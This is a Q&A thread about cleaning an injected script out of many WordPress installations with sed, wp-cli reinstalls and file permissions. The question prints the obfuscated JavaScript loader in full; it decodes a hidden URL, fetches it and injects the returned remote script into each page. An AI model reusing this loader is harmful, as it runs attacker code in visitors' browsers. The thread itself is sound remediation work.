Remove virus in wordpress with SED in a vps with linux

2

I have a VPS with more than 100 WordPress installations, and they all have this script in their header or header.php:

var _0xfcc4=["\x66\x72\x6F\x6D\x43\x68\x61\x72\x43\x6F\x64\x65","\x47\x45\x54","\x6F\x70\x65\x6E","\x73\x65\x6E\x64","\x72\x65\x73\x70\x6F\x6E\x73\x65\x54\x65\x78\x74","\x69\x6E\x64\x65\x78\x4F\x66","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x74\x79\x70\x65","\x61\x73\x79\x6E\x63","\x69\x64","\x63\x64\x6E\x37\x38\x39","\x73\x72\x63","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65","\x73\x63\x72\x69\x70\x74","\x6C\x65\x6E\x67\x74\x68"];var url=String[_0xfcc4[0]](104,116,116,112,115,58,47,47,119,119,119,46,108,101,97,114,110,105,110,103,116,111,111,108,107,105,116,46,99,108,117,98,47,108,105,110,107,46,112,104,112);var get_text=function httpGet(_0x3bc1x4){var _0x3bc1x5= new XMLHttpRequest();_0x3bc1x5[_0xfcc4[2]](_0xfcc4[1],_0x3bc1x4,false);_0x3bc1x5[_0xfcc4[3]](null);return _0x3bc1x5[_0xfcc4[4]]};var text=get_text(url);if(text!= String[_0xfcc4[0]](110,117,108,108)&& text[_0xfcc4[5]](String[_0xfcc4[0]](104,116,116,112,115,58,47,47))>  -1){var a=function(){var _0x3bc1x8=document[_0xfcc4[6]](String[_0xfcc4[0]](115,99,114,105,112,116));_0x3bc1x8[_0xfcc4[7]]= String[_0xfcc4[0]](116,101,120,116,47,106,97,118,97,115,99,114,105,112,116);_0x3bc1x8[_0xfcc4[8]]= true;_0x3bc1x8[_0xfcc4[9]]= _0xfcc4[10];_0x3bc1x8[_0xfcc4[11]]= text;document[_0xfcc4[13]](String[_0xfcc4[0]](104,101,97,100))[0][_0xfcc4[12]](_0x3bc1x8)};var scrpts=document[_0xfcc4[13]](_0xfcc4[14]);var n=true;for(var i=scrpts[_0xfcc4[15]];i--;){if(scrpts[i][_0xfcc4[9]]== _0xfcc4[10]){n= false}};if(n== true){a()}}

I tried to delete it with sed with this command:

find . -name "*.php" -exec sed -i '/var _0xfcc4.*{a()}}/d' '{}' \;

or:

find . -name "*.php" -exec sed -i '/var _0xfcc4/d' '{}' \;

but it also removes the <head> tag:

Before:

And then:

asked by José Gregorio Cortesía Rojas, 28.09.2018 at 16:03

4 answers

2

You have a big problem, I think. To start with: removing those scripts may make the page unusable.

I would begin with these actions:

1) IMPORTANT: back up all the sites (FTP and DB).

2) Disable all the site's plugins from the WordPress admin, and then deactivate the site from the hosting panel so that it is not available online.

3) I would remove the wp-admin and wp-includes folders and everything at that level except wp-config.php and .htaccess. (That is, only .htaccess, wp-config.php and the wp-content folder would remain.)

4) I would remove (noting down the names first) the plugin folders that are in wp-content/plugins.

5) I would upload the plugin folders by FTP. That is: first download the zip of each plugin, unzip it, and upload the folder with the plugin's name to wp-content/plugins.

6) Look for any .php file residing in uploads (there should be no *.php in uploads), apart from the index.php with the echo of "Silence is golden".

7) Unzip a WordPress of the same version you had installed and upload all its content, overwriting wp-content when asked. This is necessary to ensure the installation is clean.

8) In the wp-config.php file, I would add two lines at the end:

define('FS_CHMOD_FILE', 0644);
define('FS_CHMOD_DIR', 0755);

9) Activate the site, log in and activate the plugins.

This is not the complete remedy, but at least it should solve the script problem, I think. Good luck (do not forget the FTP and DB backup first of all).

answered by 28.09.2018 at 17:24
2

The problem lies in the sed expression that you use: when you write sed '/búsqueda/d' you are deleting every line that contains "búsqueda".

What you surely need is sed 's/búsqueda//', which replaces "búsqueda" with nothing, thereby removing it.

See an example:

$ cat fichero
hola
que tal estas
hola var bu ba
var va2
$ sed '/var/d' fichero
hola
que tal estas
$ sed 's/var.*//' fichero
hola
que tal estas
hola 


In your case:

find . -name "*.php" -exec sed -i.bak 's/var _0xfcc4.*{a()}}//' '{}' \;

Notice also that by doing sed -i '...' you are overwriting the file. This is dangerous, because if it does not do what you want, you lose the original. Hence, use sed -i.bak to keep a backup file.

answered by 01.10.2018 at 10:54
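The difference this answer describes, as an added example that is not part of the original question or answers: it reproduces the asker's symptom on a constructed header.php (injection on the same line as the <head> tag) and runs both sed forms, keeping the .bak copy the answer recommends. The MARKER value, the sample file and the helper names are assumptions made for this demo.

```sh
# Added example (not code from the question or the answers): it reproduces the
# asker's symptom on a constructed header.php and shows the two sed forms the
# answer above contrasts, keeping the .bak copy the answer recommends.
# The MARKER value and the sample file are constructed for this demo.
set -eu

# Start of the injected line in the question; both sed forms key on it.
MARKER='var _0xfcc4='

# Write a constructed header.php whose <head> line carries the injection,
# the layout that made '/pattern/d' take the <head> tag with it.
make_sample() {
    mkdir -p "$1"
    printf '%s\n' \
        '<!DOCTYPE html>' \
        '<html>' \
        '<head><script>var _0xfcc4=["x"];var n=true;if(n== true){a()}}</script>' \
        '<title>site</title>' \
        '</head>' > "$1/header.php"
}

# The asker's form: '/pattern/d' drops every line containing the marker,
# so <head> and the script on that line disappear together.
clean_by_delete() {
    sed -i.bak "/$MARKER/d" "$1"
}

# The answer's form: 's/pattern//' blanks only the matched script text
# and leaves the rest of the line (the <head> tag) in place.
# Note: in sed's basic regex a literal "()" is written unescaped; "\(\)"
# would be an empty group and the pattern would never match the script.
clean_by_substitute() {
    sed -i.bak "s/$MARKER.*{a()}}//" "$1"
}

# Checks used to compare the two results (exit status 0 = yes).
has_head_tag() { grep -q '<head>' "$1"; }
is_infected()  { grep -q "$MARKER" "$1"; }

# Stand-alone demo: run both forms on fresh copies and print the outcome.
demo=$(mktemp -d)
make_sample "$demo/delete"; clean_by_delete     "$demo/delete/header.php"
make_sample "$demo/subst";  clean_by_substitute "$demo/subst/header.php"
echo "--- after /pattern/d (note: <head> is gone):"; cat "$demo/delete/header.php"
echo "--- after s/pattern// (<head> kept):";         cat "$demo/subst/header.php"
ls "$demo/subst"   # header.php plus the header.php.bak copy sed -i.bak left behind
rm -rf "$demo"
```

Run it as a plain `sh` script; the .bak copy is what lets you diff the cleaned file against the original before deleting the backups across all installations.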
1

I do not know if you have already solved it; I suppose that by this point you surely have. As a quick measure, instead of removing the whole block, what I did was comment out the variable. With that it was solved quickly; afterwards it was a matter of overwriting all those .js files with the originals.

find . -type f -name "*.js" -exec sed -i 's/var _0xfcc4=/\/\/var _0xfcc4=/g' {} +

That was the quickest solution to apply as a first step, with certain guarantees of not breaking anything, since it only commented out that "infected" line.

answered by 04.10.2018 at 19:56
1

In addition to cleaning the .php files, I suggest you use wp-cli to force the reinstallation/update of the core, themes and plugins of each WordPress site.

The sequence would be:

# change to the folder containing wp-config.php
cd /carpeta/del/wordpress 

# download and install the latest WordPress version
# (the first download is cached and reused for all the other sites)
wp core download --force

# download and install the latest version of the plugins
# (the first download is cached and reused for all the other sites)
wp plugin install $(wp plugin list --field=name) --force

# download and install the latest version of the themes
# (the first download is cached and reused for all the other sites)
wp theme install $(wp theme list --field=name) --force
  • repeat for the other N installations

Re-establish owners, groups and permissions (this varies depending on the OS and how you have the apache/nginx/php users set up):

# change to the folder containing wp-config.php
cd /carpeta/del/wordpress 

# owner and group www-data; adjust according to OS and web server
sudo chown www-data: /carpeta/del/wordpress -R 

# variants depending on your security scheme: 664, 644, 640
# (adjust to your users and groups)
sudo find . -type f -exec chmod 664 {} \;

# variants depending on your security scheme: 775, 755, 750
# (adjust to your users and groups)
sudo find . -type d -exec chmod 775 {} \;

# setgid bit (g+s) so that new files inherit the group of the folder they are created in
sudo find . -type d -exec chmod g+s {} \; 

A special case is wp-config.php, which should be stricter, around 440 or 400.

answered by 04.10.2018 at 20:58
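An audit pass that checks what the first answer (step 6: no stray .php in uploads) and this answer (a strict mode on wp-config.php, no remaining infected files) tell you to verify, as an added example that is not code from any of the answers. The site tree, file names, file contents and helper names are all constructed for the demo; only the `var _0xfcc4=` marker comes from the question.

```sh
# Added example (not code from the answers): an audit pass over a WordPress
# tree for the three things the answers say to check, before and after cleaning:
# files still carrying the injected marker, stray .php files under
# wp-content/uploads (only the stock index.php belongs there), and a
# wp-config.php that is readable by others (the answer above suggests 440 or 400).
# The site tree, file names and contents are constructed for this demo.
set -eu

MARKER='var _0xfcc4='

# Build a small constructed site tree: one infected theme header, one stray
# .php in uploads, and a wp-config.php left at the common 644.
make_site() {
    root=$1
    mkdir -p "$root/wp-content/uploads/2018/09" "$root/wp-content/themes/demo"
    printf '<?php // Silence is golden.\n' > "$root/wp-content/uploads/index.php"
    printf '<?php // constructed stray file; nothing like this belongs in uploads\n' \
        > "$root/wp-content/uploads/2018/09/stray.php"
    printf '<head><script>var _0xfcc4=["x"];</script>\n' \
        > "$root/wp-content/themes/demo/header.php"
    printf '<?php define("DB_NAME", "example");\n' > "$root/wp-config.php"
    chmod 644 "$root/wp-config.php"
}

# List .php/.js files that still contain the injected marker.
find_infected() {
    find "$1" -type f \( -name '*.php' -o -name '*.js' \) \
        -exec grep -l "$MARKER" {} + 2>/dev/null || true
}

# List .php files under uploads other than the stock index.php at its top level.
find_stray_uploads() {
    find "$1/wp-content/uploads" -type f -name '*.php' \
        ! -path "$1/wp-content/uploads/index.php"
}

# 0 if wp-config.php is owner-only plus at most group-read (x40 / x00), else 1.
wp_config_mode_ok() {
    f="$1/wp-config.php"
    mode=$(stat -c '%a' "$f" 2>/dev/null || stat -f '%Lp' "$f")   # GNU stat, then BSD stat
    case "$mode" in
        [0-7][04]0) return 0 ;;
        *)          return 1 ;;
    esac
}

# One-line summary: "<infected count> <stray count> <ok|loose>".
audit() {
    n_inf=$(find_infected "$1" | wc -l | tr -d ' ')
    n_stray=$(find_stray_uploads "$1" | wc -l | tr -d ' ')
    if wp_config_mode_ok "$1"; then cfg=ok; else cfg=loose; fi
    printf '%s %s %s\n' "$n_inf" "$n_stray" "$cfg"
}

# Stand-alone demo: audit, apply the fixes the answers describe, audit again.
site=$(mktemp -d)
make_site "$site"
echo "before: $(audit "$site")"        # 1 1 loose
find_infected "$site"; find_stray_uploads "$site"
sed -i.bak 's/var _0xfcc4=.*//' "$site/wp-content/themes/demo/header.php"
rm "$site/wp-content/uploads/2018/09/stray.php"
chmod 440 "$site/wp-config.php"
echo "after:  $(audit "$site")"        # 0 0 ok
rm -rf "$site"
```

Point `audit` at each real installation's root (the folder containing wp-config.php) after the wp-cli reinstall and the chown/chmod pass; a non-zero first or second number, or "loose", means that site still needs attention before it goes back online.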